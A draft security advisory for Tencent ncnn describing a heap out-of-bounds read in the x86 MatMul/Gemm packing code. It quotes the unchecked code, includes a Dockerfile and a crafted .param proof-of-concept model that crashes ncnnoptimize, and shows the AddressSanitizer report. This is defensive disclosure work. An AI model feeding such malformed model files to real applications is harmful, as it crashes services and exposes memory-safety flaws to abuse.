All advisories
Draft

MatMul Heap Out-Of-Bounds Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

MatMul Heap Out-Of-Bounds Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:1583 in pack_B_tile
Sanitizer verdict: unknown-crash

Summary

An attacker who supplies an ncnn .param file to ncnnoptimize (or to any application that loads a model and runs inference) can make the x86 MatMul path read far past the end of a heap allocation and terminate the process. MatMul_x86::forward hands both 2-D operands to the internal Gemm layer without checking that their inner dimensions agree, so a MatMul with transB=1, A=(100,1) and B=(1,1) makes the GEMM packer treat a one-element B row as if it held 100 floats. The 32-byte AVX load in pack_B_tile walks off the end of B's allocation, which AddressSanitizer reports while ncnnoptimize is doing shape inference.

Detail

The untrusted fields are the two Input shapes and the MatMul transB flag (0=1), all read straight from the attacker-controlled parameter file. MatMul_x86::forward recognises Adims == 2 && Bdims == 2 as "matrix multiply" and passes bottom_blobs through to gemm->forward() unchanged — there is no comparison of A.w against B.w/B.h. Inside gemm_x86, the reduction length K is taken from A and the output width N from B, so the two operands are never cross-validated:

// src/layer/x86/gemm_x86.cpp:6888
    const int M = transA ? A.w : (A.dims == 3 ? A.c : A.h) * A.elempack;
    const int K = transA ? (A.dims == 3 ? A.c : A.h) * A.elempack : A.w;
    const int N = transB ? (B.dims == 3 ? B.c : B.h) * B.elempack : B.w;

// src/layer/x86/gemm_x86.cpp:1572
    for (; jj < max_jj; jj += 1)
    {
        // if (elempack == 1)
        {
            const float* p0 = (const float*)B + (j + jj) * B_hstep + k;

            int kk = 0;
#if __SSE2__
#if __AVX__
            for (; kk + 7 < max_kk; kk += 8)
            {
                _mm256_storeu_ps(pp, _mm256_loadu_ps(p0));
                pp += 8;
                p0 += 8;
            }

With the PoC values transA=0, A=(w=100,h=1) and B=(w=1,h=1), K becomes A.w = 100 and N becomes B.h * B.elempack = 1. gemm_x86 then calls pack_B_tile(B, BT_tile, j=0, max_jj=1, k=0, max_kk=min(K, TILE_K)), and the packer reads max_kk consecutive floats starting at the first (and only) row of B.

B holds a single float. Mat::create rounds the payload up to a 16-byte cstep, appends the 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD tail, giving the 84-byte region ASan names in the report. The unrolled _mm256_loadu_ps at line 1583 therefore issues its first loads inside that padding and the load starting 64 bytes into the region reads bytes 64..95, crossing the allocation boundary at 84 and aborting the optimizer during ModelWriter::shape_inference().

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-matmul-heap-out-of-bounds-read && cd ncnn-poc-matmul-heap-out-of-bounds-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
3 3
Input A 0 1 A 0=100 1=1
Input B 0 1 B 0=1 1=1
MatMul mm 2 1 A B out 0=1
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000080 at pc 0x5a10ede8076b bp 0x7ffd1df37a30 sp 0x7ffd1df37a20
READ of size 32 at 0x50e000000080 thread T0
    #0 0x5a10ede8076a in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
    #1 0x5a10ede8076a in pack_B_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:1583
    #2 0x5a10edef85a8 in gemm_x86 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:6925
    #3 0x5a10edf40c11 in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7796
    #4 0x5a10f024a6ed in ncnn::MatMul_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/matmul_x86_avx512.cpp:77
    #5 0x5a10e784870b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #6 0x5a10e7830b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x5a10e78909e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x5a10e77223c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x5a10e779feee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x758760df01c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x758760df028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x5a10e771f624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
    #0 0x758761469f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5a10e77efa4f in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5a10e77efa4f in ncnn::Mat::create(int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:373
    #3 0x5a10e7720c6a in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:389
    #4 0x5a10e779feee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #5 0x758760df01c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x758760df028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x5a10e771f624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst